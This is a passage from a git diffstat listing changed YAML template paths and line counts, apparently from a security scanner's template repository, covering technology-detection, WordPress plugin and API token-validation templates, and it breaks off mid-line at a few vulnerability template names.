.../kubernetes/kube-api/kube-api-secrets.yaml | 2 +- .../kube-api/kube-api-services.yaml | 4 +- .../kubernetes/kube-api/kube-api-version.yaml | 4 +- .../kubernetes/kubelet/kubelet-healthz.yaml | 4 +- .../kubernetes/kubelet/kubelet-metrics.yaml | 4 +- .../kubernetes/kubelet/kubelet-pods.yaml | 4 +- .../kubelet/kubelet-runningpods.yaml | 2 +- .../kubernetes/kubelet/kubelet-stats.yaml | 4 +- .../kubernetes/kubernetes-version.yaml | 3 +- http/technologies/landesk/landesk-csa.yaml | 2 +- http/technologies/landesk/landesk-ma.yaml | 2 +- http/technologies/lexmark-detect.yaml | 2 +- http/technologies/limesurvey-detect.yaml | 3 +- http/technologies/linkerd-detect.yaml | 3 +- http/technologies/livehelperchat-detect.yaml | 4 +- http/technologies/lotus-domino-version.yaml | 7 +- http/technologies/lucee-detect.yaml | 2 +- http/technologies/lucy-admin-panel.yaml | 3 +- http/technologies/magento-detect.yaml | 7 +- http/technologies/magento-eol.yaml | 3 +- http/technologies/magento-version-detect.yaml | 4 +- http/technologies/magmi-detect.yaml | 2 +- http/technologies/maian-cart-detect.yaml | 4 +- http/technologies/matrix-detect.yaml | 3 +- http/technologies/metatag-cms.yaml | 3 +- .../microsoft/default-iis7-page.yaml | 1 + .../default-microsoft-azure-page.yaml | 1 + .../default-windows-server-page.yaml | 1 + .../microsoft/microsoft-iis-version.yaml | 2 +- .../microsoft-sharepoint-detect.yaml | 2 +- .../microsoft/ms-exchange-server.yaml | 2 +- .../microsoft/sql-server-reporting.yaml | 3 +- http/technologies/microstrategy-detect.yaml | 3 +- http/technologies/mikrotik-httpproxy.yaml | 2 +- http/technologies/moinmoin-detect.yaml | 4 +- http/technologies/mojoportal-detect.yaml | 3 +- http/technologies/mongoose-server.yaml | 2 +- http/technologies/monstracms-detect.yaml | 3 +- http/technologies/moveit-transfer-detect.yaml | 3 +- http/technologies/mrtg-detect.yaml | 4 +- http/technologies/nacos-version.yaml | 2 +- http/technologies/neos-detect.yaml | 2 +- .../nethermind-server-detect.yaml | 4 +- .../netsweeper-webadmin-detect.yaml | 7 +- http/technologies/nextcloud-detect.yaml | 3 +- .../nextcloud-owncloud-detect.yaml | 2 +- http/technologies/nexus-detect.yaml | 2 +- .../nginx/default-nginx-page.yaml | 1 + http/technologies/nginx/nginx-version.yaml | 2 +- http/technologies/nifi-detech.yaml | 3 +- http/technologies/nimplant-c2.yaml | 2 +- http/technologies/nimsoft-wasp.yaml | 2 +- http/technologies/node-red-detect.yaml | 4 +- http/technologies/notion-detect.yaml | 2 +- http/technologies/ntop-detect.yaml | 4 +- http/technologies/oauth2-detect.yaml | 4 +- http/technologies/octobercms-detect.yaml | 4 +- http/technologies/oidc-detect.yaml | 3 +- .../omni-commerce-connect-detect.yaml | 4 +- http/technologies/oneblog-detect.yaml | 2 +- http/technologies/open-journal-systems.yaml | 3 +- .../open-virtualization-manager-detect.yaml | 5 +- http/technologies/openai-plugin.yaml | 2 +- http/technologies/openhap-detect.yaml | 3 +- http/technologies/openproject-detect.yaml | 3 +- http/technologies/openresty-detect.yaml | 2 +- http/technologies/openssl-detect.yaml | 3 +- http/technologies/oracle-httpserver12c.yaml | 2 +- .../oracle/oracle-access-manager-detect.yaml | 2 +- .../oracle/oracle-atg-commerce.yaml | 4 +- .../oracle/oracle-dbass-detect.yaml | 2 +- .../oracle/oracle-iplanet-web-server.yaml | 1 - .../oracle/oracle-webcenter-sites.yaml | 2 +- http/technologies/osquery-fleet-detect.yaml | 8 +- .../owasp-juice-shop-detected.yaml | 1 - http/technologies/pagespeed-detect.yaml | 2 +- .../payara-micro-server-detect.yaml | 2 +- http/technologies/pbootcms-detect.yaml | 2 +- http/technologies/pega-detect.yaml | 2 +- http/technologies/php-detect.yaml | 2 +- http/technologies/php-fusion-detect.yaml | 1 + http/technologies/php-proxy-detect.yaml | 3 +- http/technologies/phplist-detect.yaml | 2 +- http/technologies/phppgadmin-version.yaml | 4 +- http/technologies/pi-hole-detect.yaml | 3 +- http/technologies/plone-cms-detect.yaml | 4 +- http/technologies/prestashop-detect.yaml | 2 +- http/technologies/projectsend-detect.yaml | 2 +- http/technologies/prtg-detect.yaml | 3 +- http/technologies/puppetdb-detect.yaml | 2 +- http/technologies/puppetserver-detect.yaml | 4 +- http/technologies/pypiserver-detect.yaml | 2 +- http/technologies/redcap-detector.yaml | 2 +- http/technologies/redmine-cli-detect.yaml | 2 +- http/technologies/rhymix-cms-detect.yaml | 3 +- http/technologies/rosariosis-detect.yaml | 2 +- .../roundcube-webmail-portal.yaml | 2 +- http/technologies/rsshub-detect.yaml | 2 +- http/technologies/s3-detect.yaml | 4 +- http/technologies/samsung-smarttv-debug.yaml | 2 +- http/technologies/sap-spartacus-detect.yaml | 2 +- http/technologies/sap/sap-igs-detect.yaml | 3 +- .../sap/sap-netweaver-webgui.yaml | 2 +- .../sap/sap-web-dispatcher-admin-portal.yaml | 1 - http/technologies/sap/sap-web-dispatcher.yaml | 3 +- http/technologies/sceditor-detect.yaml | 2 +- http/technologies/secui-waf-detect.yaml | 10 +- .../sharefile-storage-server.yaml | 3 +- http/technologies/shiro-detect.yaml | 4 +- http/technologies/shopizer-detect.yaml | 2 +- http/technologies/shopware-detect.yaml | 3 +- http/technologies/sitecore-cms.yaml | 3 +- http/technologies/sitecore-version.yaml | 2 +- http/technologies/smartstore-detect.yaml | 1 - http/technologies/smtp2go-detect.yaml | 1 + http/technologies/snipeit-panel.yaml | 2 +- http/technologies/sogo-detect.yaml | 3 +- .../sonicwall-email-security-detect.yaml | 10 +- http/technologies/spinnaker-detect.yaml | 4 +- .../splash-rendering-service.yaml | 4 +- http/technologies/spring-detect.yaml | 3 +- http/technologies/springboot-actuator.yaml | 1 + http/technologies/springboot-whitelabel.yaml | 3 +- http/technologies/strapi-cms-detect.yaml | 2 +- http/technologies/subrion-cms-detect.yaml | 2 +- http/technologies/sucuri-firewall.yaml | 2 +- .../swag-instance-default-page.yaml | 5 +- http/technologies/switch-protocol.yaml | 2 +- http/technologies/synology-web-station.yaml | 4 +- http/technologies/tableau-server-detect.yaml | 2 +- .../telerik/telerik-dialoghandler-detect.yaml | 4 +- .../telerik/telerik-fileupload-detect.yaml | 2 +- http/technologies/teradici-pcoip.yaml | 2 +- http/technologies/terraform-detect.yaml | 2 +- http/technologies/thinkcmf-detect.yaml | 4 +- http/technologies/thinkphp-detect.yaml | 7 +- http/technologies/tileserver-gl.yaml | 2 +- http/technologies/tor-socks-proxy.yaml | 3 +- http/technologies/tornado-server-login.yaml | 4 +- http/technologies/utility-service-detect.yaml | 2 +- http/technologies/vbulletin-detect.yaml | 2 +- http/technologies/versa-flexvnf-server.yaml | 3 +- .../versa/versa-analytics-server.yaml | 2 +- .../versa/versa-director-api.yaml | 2 +- .../versa/versa-networks-detect.yaml | 2 +- .../vivotex-web-console-detect.yaml | 2 +- http/technologies/vmware/vmware-detect.yaml | 2 +- .../vmware/vmware-horizon-version.yaml | 2 +- .../vmware/vmware-site-recovery-manager.yaml | 2 +- .../vmware/vmware-vrealize-detect.yaml | 2 +- http/technologies/waf-detect.yaml | 2 +- http/technologies/web-ftp-detect.yaml | 5 +- http/technologies/weblogic-detect.yaml | 2 +- .../werkzeug-debugger-detect.yaml | 2 +- http/technologies/wms-server-detect.yaml | 2 +- http/technologies/wondercms-detect.yaml | 2 +- http/technologies/wordpress-detect.yaml | 5 +- .../wordpress/plugins/ad-inserter.yaml | 1 - .../wordpress/plugins/add-to-any.yaml | 1 - .../wordpress/plugins/admin-menu-editor.yaml | 1 - .../wordpress/plugins/adminimize.yaml | 1 - .../plugins/advanced-custom-fields.yaml | 1 - .../wordpress/plugins/akismet.yaml | 1 - .../plugins/all-404-redirect-to-homepage.yaml | 1 - .../plugins/all-in-one-seo-pack.yaml | 1 - .../plugins/all-in-one-wp-migration.yaml | 1 - .../all-in-one-wp-security-and-firewall.yaml | 1 - http/technologies/wordpress/plugins/amp.yaml | 1 - .../wordpress/plugins/antispam-bee.yaml | 1 - .../wordpress/plugins/astra-sites.yaml | 1 - .../wordpress/plugins/astra-widgets.yaml | 1 - .../wordpress/plugins/autoptimize.yaml | 1 - .../wordpress/plugins/backwpup.yaml | 1 - .../plugins/better-search-replace.yaml | 1 - .../wordpress/plugins/better-wp-security.yaml | 1 - .../plugins/black-studio-tinymce-widget.yaml | 1 - .../wordpress/plugins/breadcrumb-navxt.yaml | 1 - .../wordpress/plugins/breeze.yaml | 1 - .../plugins/broken-link-checker.yaml | 1 - .../plugins/child-theme-configurator.yaml | 1 - .../wordpress/plugins/classic-editor.yaml | 1 - .../wordpress/plugins/classic-widgets.yaml | 1 - .../plugins/click-to-chat-for-whatsapp.yaml | 1 - .../wordpress/plugins/cloudflare.yaml | 1 - http/technologies/wordpress/plugins/cmb2.yaml | 1 - .../wordpress/plugins/coblocks.yaml | 1 - .../wordpress/plugins/code-snippets.yaml | 1 - .../wordpress/plugins/coming-soon.yaml | 1 - .../wordpress/plugins/complianz-gdpr.yaml | 1 - .../plugins/contact-form-7-honeypot.yaml | 1 - .../wordpress/plugins/contact-form-7.yaml | 1 - .../wordpress/plugins/contact-form-cfdb7.yaml | 1 - .../wordpress/plugins/cookie-law-info.yaml | 1 - .../wordpress/plugins/cookie-notice.yaml | 1 - .../wordpress/plugins/creame-whatsapp-me.yaml | 1 - .../creative-mail-by-constant-contact.yaml | 1 - .../wordpress/plugins/custom-css-js.yaml | 1 - .../wordpress/plugins/custom-fonts.yaml | 1 - .../plugins/custom-post-type-ui.yaml | 1 - .../wordpress/plugins/disable-comments.yaml | 1 - .../wordpress/plugins/disable-gutenberg.yaml | 1 - .../wordpress/plugins/duplicate-page.yaml | 1 - .../wordpress/plugins/duplicate-post.yaml | 1 - .../wordpress/plugins/duplicator.yaml | 1 - .../duracelltomi-google-tag-manager.yaml | 1 - .../wordpress/plugins/easy-fancybox.yaml | 1 - .../wordpress/plugins/easy-google-fonts.yaml | 1 - .../plugins/easy-table-of-contents.yaml | 1 - .../wordpress/plugins/easy-wp-smtp.yaml | 1 - .../wordpress/plugins/elementor.yaml | 1 - .../wordpress/plugins/elementskit-lite.yaml | 1 - .../plugins/enable-media-replace.yaml | 1 - .../wordpress/plugins/envato-elements.yaml | 1 - .../essential-addons-for-elementor-lite.yaml | 1 - .../plugins/ewww-image-optimizer.yaml | 1 - .../plugins/facebook-for-woocommerce.yaml | 1 - .../wordpress/plugins/fast-indexing-api.yaml | 1 - .../favicon-by-realfavicongenerator.yaml | 1 - .../wordpress/plugins/flamingo.yaml | 1 - .../wordpress/plugins/fluentform.yaml | 1 - .../wordpress/plugins/font-awesome.yaml | 1 - .../plugins/force-regenerate-thumbnails.yaml | 1 - .../wordpress/plugins/formidable.yaml | 1 - .../wordpress/plugins/forminator.yaml | 1 - .../plugins/ga-google-analytics.yaml | 1 - .../plugins/gdpr-cookie-compliance.yaml | 1 - .../google-analytics-dashboard-for-wp.yaml | 1 - .../google-analytics-for-wordpress.yaml | 1 - .../plugins/google-listings-and-ads.yaml | 1 - .../wordpress/plugins/google-site-kit.yaml | 1 - .../plugins/google-sitemap-generator.yaml | 1 - .../wordpress/plugins/gtranslate.yaml | 1 - .../wordpress/plugins/gutenberg.yaml | 1 - .../plugins/happy-elementor-addons.yaml | 1 - .../plugins/header-and-footer-scripts.yaml | 1 - .../plugins/header-footer-code-manager.yaml | 1 - .../plugins/header-footer-elementor.yaml | 1 - .../wordpress/plugins/header-footer.yaml | 1 - .../wordpress/plugins/health-check.yaml | 1 - .../wordpress/plugins/hello-dolly.yaml | 1 - .../plugins/host-webfonts-local.yaml | 1 - .../wordpress/plugins/imagify.yaml | 1 - .../wordpress/plugins/imsanity.yaml | 1 - .../plugins/insert-headers-and-footers.yaml | 1 - .../wordpress/plugins/instagram-feed.yaml | 1 - .../plugins/intuitive-custom-post-order.yaml | 1 - .../wordpress/plugins/iwp-client.yaml | 1 - .../wordpress/plugins/jetpack-boost.yaml | 1 - .../wordpress/plugins/jetpack.yaml | 1 - .../wordpress/plugins/kadence-blocks.yaml | 1 - .../technologies/wordpress/plugins/kirki.yaml | 1 - .../wordpress/plugins/leadin.yaml | 1 - .../limit-login-attempts-reloaded.yaml | 1 - .../plugins/limit-login-attempts.yaml | 1 - .../wordpress/plugins/litespeed-cache.yaml | 1 - .../wordpress/plugins/loco-translate.yaml | 1 - .../wordpress/plugins/loginizer.yaml | 1 - .../wordpress/plugins/loginpress.yaml | 1 - .../plugins/mailchimp-for-woocommerce.yaml | 1 - .../wordpress/plugins/mailchimp-for-wp.yaml | 1 - .../wordpress/plugins/mailpoet.yaml | 1 - .../wordpress/plugins/maintenance.yaml | 1 - .../wordpress/plugins/mainwp-child.yaml | 1 - .../wordpress/plugins/malcare-security.yaml | 1 - .../wordpress/plugins/megamenu.yaml | 1 - .../wordpress/plugins/members.yaml | 1 - .../wordpress/plugins/meta-box.yaml | 1 - .../wordpress/plugins/ml-slider.yaml | 1 - .../wordpress/plugins/newsletter.yaml | 1 - .../plugins/nextend-facebook-connect.yaml | 1 - .../wordpress/plugins/nextgen-gallery.yaml | 1 - .../wordpress/plugins/ninja-forms.yaml | 1 - .../wordpress/plugins/ocean-extra.yaml | 1 - .../plugins/official-facebook-pixel.yaml | 1 - .../plugins/one-click-demo-import.yaml | 1 - .../wordpress/plugins/optinmonster.yaml | 1 - .../wordpress/plugins/otter-blocks.yaml | 1 - .../wordpress/plugins/password-protected.yaml | 1 - .../wordpress/plugins/pdf-embedder.yaml | 1 - .../wordpress/plugins/photo-gallery.yaml | 1 - .../plugins/php-compatibility-checker.yaml | 1 - .../plugins/pinterest-for-woocommerce.yaml | 1 - .../wordpress/plugins/pixelyoursite.yaml | 1 - .../wordpress/plugins/polylang.yaml | 1 - .../wordpress/plugins/popup-builder.yaml | 1 - .../wordpress/plugins/popup-maker.yaml | 1 - .../wordpress/plugins/post-smtp.yaml | 1 - .../wordpress/plugins/post-types-order.yaml | 1 - .../plugins/premium-addons-for-elementor.yaml | 1 - .../wordpress/plugins/pretty-link.yaml | 1 - .../plugins/really-simple-captcha.yaml | 1 - .../wordpress/plugins/really-simple-ssl.yaml | 1 - .../wordpress/plugins/redirection.yaml | 1 - .../wordpress/plugins/redux-framework.yaml | 1 - .../plugins/regenerate-thumbnails.yaml | 1 - .../wordpress/plugins/safe-svg.yaml | 1 - .../wordpress/plugins/seo-by-rank-math.yaml | 1 - .../wordpress/plugins/sg-cachepress.yaml | 1 - .../wordpress/plugins/sg-security.yaml | 1 - .../plugins/shortcodes-ultimate.yaml | 1 - .../plugins/shortpixel-image-optimiser.yaml | 1 - .../plugins/simple-custom-post-order.yaml | 1 - .../plugins/simple-page-ordering.yaml | 1 - .../wordpress/plugins/siteguard.yaml | 1 - .../wordpress/plugins/siteorigin-panels.yaml | 1 - .../wordpress/plugins/smart-slider-3.yaml | 1 - .../wordpress/plugins/so-widgets-bundle.yaml | 1 - .../plugins/ssl-insecure-content-fixer.yaml | 1 - .../stops-core-theme-and-plugin-updates.yaml | 1 - .../wordpress/plugins/sucuri-scanner.yaml | 1 - .../wordpress/plugins/svg-support.yaml | 1 - .../plugins/table-of-contents-plus.yaml | 1 - .../wordpress/plugins/tablepress.yaml | 1 - .../plugins/taxonomy-terms-order.yaml | 1 - .../plugins/the-events-calendar.yaml | 1 - .../plugins/themeisle-companion.yaml | 1 - .../wordpress/plugins/tinymce-advanced.yaml | 1 - .../plugins/translatepress-multilingual.yaml | 1 - .../ultimate-addons-for-gutenberg.yaml | 1 - .../plugins/under-construction-page.yaml | 1 - .../wordpress/plugins/unyson.yaml | 1 - .../wordpress/plugins/updraftplus.yaml | 1 - .../wordpress/plugins/use-any-font.yaml | 1 - .../wordpress/plugins/user-role-editor.yaml | 1 - .../plugins/velvet-blues-update-urls.yaml | 1 - .../wordpress/plugins/w3-total-cache.yaml | 1 - .../plugins/webp-converter-for-media.yaml | 1 - .../wordpress/plugins/webp-express.yaml | 1 - .../plugins/widget-importer-exporter.yaml | 1 - .../woo-cart-abandonment-recovery.yaml | 1 - .../woo-checkout-field-editor-pro.yaml | 1 - .../plugins/woo-variation-swatches.yaml | 1 - ...merce-gateway-paypal-express-checkout.yaml | 1 - .../plugins/woocommerce-gateway-stripe.yaml | 1 - .../plugins/woocommerce-payments.yaml | 1 - .../plugins/woocommerce-paypal-payments.yaml | 1 - ...oocommerce-pdf-invoices-packing-slips.yaml | 1 - .../plugins/woocommerce-services.yaml | 1 - .../wordpress/plugins/woocommerce.yaml | 1 - .../wordpress/plugins/woosidebars.yaml | 1 - .../wordpress/plugins/wordfence.yaml | 1 - .../wordpress/plugins/wordpress-importer.yaml | 1 - .../wordpress/plugins/wordpress-seo.yaml | 1 - .../wordpress/plugins/worker.yaml | 1 - .../wordpress/plugins/wp-fastest-cache.yaml | 1 - .../wordpress/plugins/wp-file-manager.yaml | 1 - .../wordpress/plugins/wp-google-maps.yaml | 1 - .../wordpress/plugins/wp-mail-smtp.yaml | 1 - .../plugins/wp-maintenance-mode.yaml | 1 - .../wordpress/plugins/wp-migrate-db.yaml | 1 - .../wordpress/plugins/wp-multibyte-patch.yaml | 1 - .../wordpress/plugins/wp-optimize.yaml | 1 - .../wordpress/plugins/wp-pagenavi.yaml | 1 - .../wordpress/plugins/wp-reset.yaml | 1 - .../plugins/wp-reviews-plugin-for-google.yaml | 1 - .../wordpress/plugins/wp-rollback.yaml | 1 - .../wordpress/plugins/wp-seopress.yaml | 1 - .../wordpress/plugins/wp-sitemap-page.yaml | 1 - .../wordpress/plugins/wp-smushit.yaml | 1 - .../wordpress/plugins/wp-statistics.yaml | 1 - .../wordpress/plugins/wp-super-cache.yaml | 1 - .../wordpress/plugins/wp-user-avatar.yaml | 1 - .../wordpress/plugins/wpcf7-recaptcha.yaml | 1 - .../wordpress/plugins/wpcf7-redirect.yaml | 1 - .../wordpress/plugins/wpforms-lite.yaml | 1 - .../wordpress/plugins/wps-hide-login.yaml | 1 - .../plugins/wpvivid-backuprestore.yaml | 1 - .../plugins/yith-woocommerce-compare.yaml | 1 - .../plugins/yith-woocommerce-wishlist.yaml | 1 - .../workerman-websocket-detect.yaml | 2 +- http/technologies/wso2-products-detect.yaml | 2 +- http/technologies/wuzhicms-detect.yaml | 6 +- .../technologies/xerox-workcentre-detect.yaml | 2 +- http/technologies/yeswiki-detect.yaml | 5 +- http/technologies/ymhome-detect.yaml | 1 + http/technologies/zap-api-detect.yaml | 4 +- http/technologies/zend-server-test-page.yaml | 2 +- http/technologies/zerof-webserver-detect.yaml | 2 +- http/technologies/zimbra-detect.yaml | 2 +- http/token-spray/api-1forge.yaml | 3 +- .../api-abstract-company-enrichment.yaml | 3 +- .../api-abstract-email-validation.yaml | 3 +- .../api-abstract-exchange-rates.yaml | 3 +- .../api-abstract-iban-validation.yaml | 3 +- .../api-abstract-image-processing.yaml | 3 +- .../api-abstract-ip-geolocation.yaml | 3 +- .../api-abstract-phone-validation.yaml | 3 +- .../api-abstract-public-holidays.yaml | 3 +- http/token-spray/api-abstract-timezone.yaml | 3 +- .../api-abstract-user-avatars.yaml | 3 +- .../api-abstract-vat-validation-rates.yaml | 3 +- .../api-abstract-website-screenshot.yaml | 5 +- http/token-spray/api-abuseipdb.yaml | 5 +- http/token-spray/api-accuweather.yaml | 3 +- http/token-spray/api-adafruit-io.yaml | 7 +- http/token-spray/api-adoptapet.yaml | 3 +- http/token-spray/api-airtable.yaml | 3 +- http/token-spray/api-alchemy.yaml | 5 +- http/token-spray/api-alienvault.yaml | 3 +- http/token-spray/api-amdoren.yaml | 3 +- http/token-spray/api-aniapi.yaml | 5 +- http/token-spray/api-api2convert.yaml | 3 +- http/token-spray/api-apiflash.yaml | 3 +- http/token-spray/api-apigee-edge.yaml | 4 +- http/token-spray/api-appveyor.yaml | 7 +- http/token-spray/api-asana.yaml | 5 +- http/token-spray/api-bhagavadgita.yaml | 3 +- http/token-spray/api-bible.yaml | 5 +- http/token-spray/api-binance.yaml | 7 +- http/token-spray/api-binaryedge.yaml | 5 +- http/token-spray/api-bingmaps.yaml | 3 +- http/token-spray/api-bitcoinaverage.yaml | 3 +- http/token-spray/api-bitly.yaml | 3 +- http/token-spray/api-bitquery.yaml | 3 +- http/token-spray/api-bitrise.yaml | 3 +- http/token-spray/api-blitapp.yaml | 3 +- http/token-spray/api-block.yaml | 3 +- http/token-spray/api-blockchain.yaml | 3 +- http/token-spray/api-blockfrost.yaml | 3 +- http/token-spray/api-box.yaml | 3 +- http/token-spray/api-bravenewcoin.yaml | 3 +- http/token-spray/api-browshot.yaml | 3 +- http/token-spray/api-buildkite.yaml | 7 +- http/token-spray/api-buttercms.yaml | 5 +- http/token-spray/api-c99.yaml | 3 +- http/token-spray/api-calendarific.yaml | 3 +- http/token-spray/api-calendly.yaml | 7 +- http/token-spray/api-chaos.yaml | 5 +- http/token-spray/api-charity.yaml | 3 +- http/token-spray/api-circleci.yaml | 3 +- http/token-spray/api-clearbit.yaml | 3 +- http/token-spray/api-clickup.yaml | 3 +- http/token-spray/api-clockify.yaml | 3 +- http/token-spray/api-cloudconvert.yaml | 3 +- http/token-spray/api-cloudflare.yaml | 3 +- http/token-spray/api-codestats.yaml | 3 +- http/token-spray/api-coinapi.yaml | 3 +- http/token-spray/api-coinlayer.yaml | 3 +- http/token-spray/api-coinmarketcap.yaml | 3 +- http/token-spray/api-coinranking.yaml | 3 +- http/token-spray/api-cooperhewitt.yaml | 3 +- http/token-spray/api-covalent.yaml | 3 +- http/token-spray/api-craftmypdf.yaml | 3 +- http/token-spray/api-currencyfreaks.yaml | 3 +- http/token-spray/api-currencylayer.yaml | 3 +- http/token-spray/api-currencyscoop.yaml | 3 +- http/token-spray/api-dbt.yaml | 7 +- http/token-spray/api-ddownload.yaml | 3 +- http/token-spray/api-debounce.yaml | 3 +- http/token-spray/api-deviantart.yaml | 5 +- http/token-spray/api-digitalocean.yaml | 3 +- http/token-spray/api-dribbble.yaml | 3 +- http/token-spray/api-dropbox.yaml | 5 +- http/token-spray/api-ebird.yaml | 5 +- http/token-spray/api-etherscan.yaml | 3 +- http/token-spray/api-europeana.yaml | 5 +- http/token-spray/api-exchangerateapi.yaml | 3 +- http/token-spray/api-facebook.yaml | 3 +- http/token-spray/api-fastly.yaml | 5 +- http/token-spray/api-festivo.yaml | 3 +- http/token-spray/api-flickr.yaml | 3 +- http/token-spray/api-flowdash.yaml | 3 +- http/token-spray/api-fontawesome.yaml | 4 +- http/token-spray/api-fortitoken-cloud.yaml | 4 +- http/token-spray/api-front.yaml | 3 +- http/token-spray/api-fullhunt.yaml | 5 +- http/token-spray/api-giphy.yaml | 3 +- http/token-spray/api-github.yaml | 5 +- http/token-spray/api-gitlab.yaml | 5 +- http/token-spray/api-gofile.yaml | 3 +- http/token-spray/api-google-drive.yaml | 3 +- http/token-spray/api-gorest.yaml | 3 +- http/token-spray/api-harvardart.yaml | 3 +- http/token-spray/api-heroku.yaml | 7 +- http/token-spray/api-hirak-rates.yaml | 3 +- http/token-spray/api-holidayapi.yaml | 3 +- http/token-spray/api-host-io.yaml | 3 +- http/token-spray/api-html2pdf.yaml | 3 +- http/token-spray/api-hubspot.yaml | 5 +- http/token-spray/api-hunter.yaml | 3 +- http/token-spray/api-iconfinder.yaml | 3 +- http/token-spray/api-improvmx.yaml | 3 +- http/token-spray/api-instagram.yaml | 3 +- http/token-spray/api-instatus.yaml | 5 +- http/token-spray/api-intelx.yaml | 5 +- http/token-spray/api-intercom.yaml | 5 +- http/token-spray/api-ip2whois.yaml | 3 +- http/token-spray/api-ipdata.yaml | 3 +- http/token-spray/api-ipfind.yaml | 3 +- http/token-spray/api-ipinfo.yaml | 4 +- http/token-spray/api-ipstack.yaml | 3 +- http/token-spray/api-iterable.yaml | 5 +- http/token-spray/api-iucn.yaml | 3 +- http/token-spray/api-jsonbin.yaml | 3 +- http/token-spray/api-jumpcloud.yaml | 5 +- http/token-spray/api-launchdarkly.yaml | 3 +- http/token-spray/api-leanix.yaml | 7 +- http/token-spray/api-linkedin.yaml | 5 +- http/token-spray/api-lob.yaml | 5 +- http/token-spray/api-lokalise.yaml | 7 +- http/token-spray/api-mac-address-lookup.yaml | 3 +- http/token-spray/api-mailboxvalidator.yaml | 3 +- http/token-spray/api-mailchimp.yaml | 3 +- http/token-spray/api-mailgun.yaml | 5 +- http/token-spray/api-malshare.yaml | 3 +- http/token-spray/api-malwarebazaar.yaml | 3 +- http/token-spray/api-mapbox.yaml | 3 +- http/token-spray/api-micro-user-service.yaml | 3 +- http/token-spray/api-mojoauth.yaml | 3 +- http/token-spray/api-monday.yaml | 3 +- http/token-spray/api-moonpay.yaml | 3 +- http/token-spray/api-myanimelist.yaml | 5 +- http/token-spray/api-mywot.yaml | 3 +- http/token-spray/api-nerdgraph.yaml | 6 +- http/token-spray/api-netlify.yaml | 5 +- http/token-spray/api-networksdb.yaml | 3 +- http/token-spray/api-newrelic.yaml | 3 +- http/token-spray/api-notolytix.yaml | 3 +- http/token-spray/api-nownodes.yaml | 3 +- http/token-spray/api-npm.yaml | 5 +- http/token-spray/api-nytimes.yaml | 3 +- http/token-spray/api-onelogin.yaml | 5 +- http/token-spray/api-open-page-rank.yaml | 3 +- http/token-spray/api-opengraphr.yaml | 3 +- http/token-spray/api-openweather.yaml | 3 +- http/token-spray/api-opsgenie.yaml | 5 +- http/token-spray/api-optimizely.yaml | 6 +- http/token-spray/api-orbintelligence.yaml | 3 +- http/token-spray/api-pagecdn.yaml | 3 +- http/token-spray/api-pagerduty.yaml | 5 +- http/token-spray/api-particle.yaml | 3 +- http/token-spray/api-pastebin.yaml | 3 +- http/token-spray/api-paypal.yaml | 6 +- http/token-spray/api-pdflayer.yaml | 3 +- http/token-spray/api-pendo.yaml | 7 +- http/token-spray/api-petfinder.yaml | 13 +- http/token-spray/api-pinata.yaml | 3 +- http/token-spray/api-pivotaltracker.yaml | 5 +- http/token-spray/api-postmark.yaml | 5 +- http/token-spray/api-prexview.yaml | 3 +- http/token-spray/api-proxycrawl.yaml | 3 +- http/token-spray/api-proxykingdom.yaml | 3 +- http/token-spray/api-quip.yaml | 3 +- http/token-spray/api-rijksmuseum.yaml | 3 +- http/token-spray/api-savepage.yaml | 3 +- http/token-spray/api-scanii.yaml | 3 +- http/token-spray/api-scraperapi.yaml | 3 +- http/token-spray/api-scraperbox.yaml | 3 +- http/token-spray/api-scrapestack.yaml | 3 +- http/token-spray/api-scrapingant.yaml | 3 +- http/token-spray/api-scrapingdog.yaml | 3 +- http/token-spray/api-screenshotapi.yaml | 3 +- http/token-spray/api-securitytrails.yaml | 5 +- http/token-spray/api-segment.yaml | 3 +- http/token-spray/api-sendgrid.yaml | 4 +- http/token-spray/api-sentry.yaml | 5 +- http/token-spray/api-serpstack.yaml | 3 +- http/token-spray/api-shodan.yaml | 3 +- http/token-spray/api-slack.yaml | 7 +- http/token-spray/api-smartsheet.yaml | 4 +- http/token-spray/api-sonarcloud.yaml | 5 +- http/token-spray/api-spotify.yaml | 7 +- http/token-spray/api-square.yaml | 5 +- http/token-spray/api-sslmate.yaml | 5 +- http/token-spray/api-strava.yaml | 5 +- http/token-spray/api-stripe.yaml | 7 +- http/token-spray/api-stytch.yaml | 5 +- http/token-spray/api-supportivekoala.yaml | 3 +- http/token-spray/api-taiga.yaml | 5 +- http/token-spray/api-tatum.yaml | 3 +- http/token-spray/api-thecatapi.yaml | 7 +- http/token-spray/api-thedogapi.yaml | 5 +- http/token-spray/api-ticketmaster.yaml | 4 +- http/token-spray/api-tink.yaml | 5 +- http/token-spray/api-tinypng.yaml | 5 +- http/token-spray/api-todoist.yaml | 3 +- http/token-spray/api-trello.yaml | 3 +- http/token-spray/api-twitter.yaml | 5 +- http/token-spray/api-urlscan.yaml | 3 +- http/token-spray/api-userstack.yaml | 3 +- http/token-spray/api-vercel.yaml | 7 +- http/token-spray/api-virustotal.yaml | 3 +- http/token-spray/api-visualstudio.yaml | 5 +- http/token-spray/api-wakatime.yaml | 3 +- http/token-spray/api-web3storage.yaml | 3 +- http/token-spray/api-webex.yaml | 5 +- http/token-spray/api-weglot.yaml | 6 +- http/token-spray/api-wordcloud.yaml | 3 +- http/token-spray/api-wordnik.yaml | 3 +- http/token-spray/api-youtube.yaml | 5 +- http/token-spray/api-zenrows.yaml | 3 +- http/token-spray/api-zerbounce.yaml | 4 +- http/token-spray/api-zoomeye.yaml | 5 +- http/token-spray/google-autocomplete.yaml | 3 +- http/token-spray/google-books.yaml | 3 +- http/token-spray/google-customsearch.yaml | 3 +- http/token-spray/google-directions.yaml | 3 +- http/token-spray/google-elevation.yaml | 3 +- http/token-spray/google-fcm.yaml | 6 +- .../token-spray/google-findplacefromtext.yaml | 3 +- http/token-spray/google-gedistancematrix.yaml | 3 +- http/token-spray/google-geocode.yaml | 3 +- http/token-spray/google-geolocation.yaml | 3 +- http/token-spray/google-mapsembed.yaml | 3 +- .../token-spray/google-mapsembedadvanced.yaml | 3 +- http/token-spray/google-nearbysearch.yaml | 3 +- http/token-spray/google-nearestroads.yaml | 3 +- http/token-spray/google-placedetails.yaml | 3 +- http/token-spray/google-placesphoto.yaml | 3 +- .../token-spray/google-playablelocations.yaml | 3 +- http/token-spray/google-routetotraveled.yaml | 3 +- http/token-spray/google-safebrowsing.yaml | 5 +- http/token-spray/google-speedlimit.yaml | 3 +- http/token-spray/google-staticmaps.yaml | 3 +- http/token-spray/google-streetview.yaml | 3 +- http/token-spray/google-timezone.yaml | 3 +- http/token-spray/googlet-extsearchplaces.yaml | 3 +- .../74cms/74cms-weixin-sqli.yaml | 3 +- .../amazon/amazon-ec2-ssrf.yaml | 3 +- .../apache-druid-kafka-connect-rce.yaml | 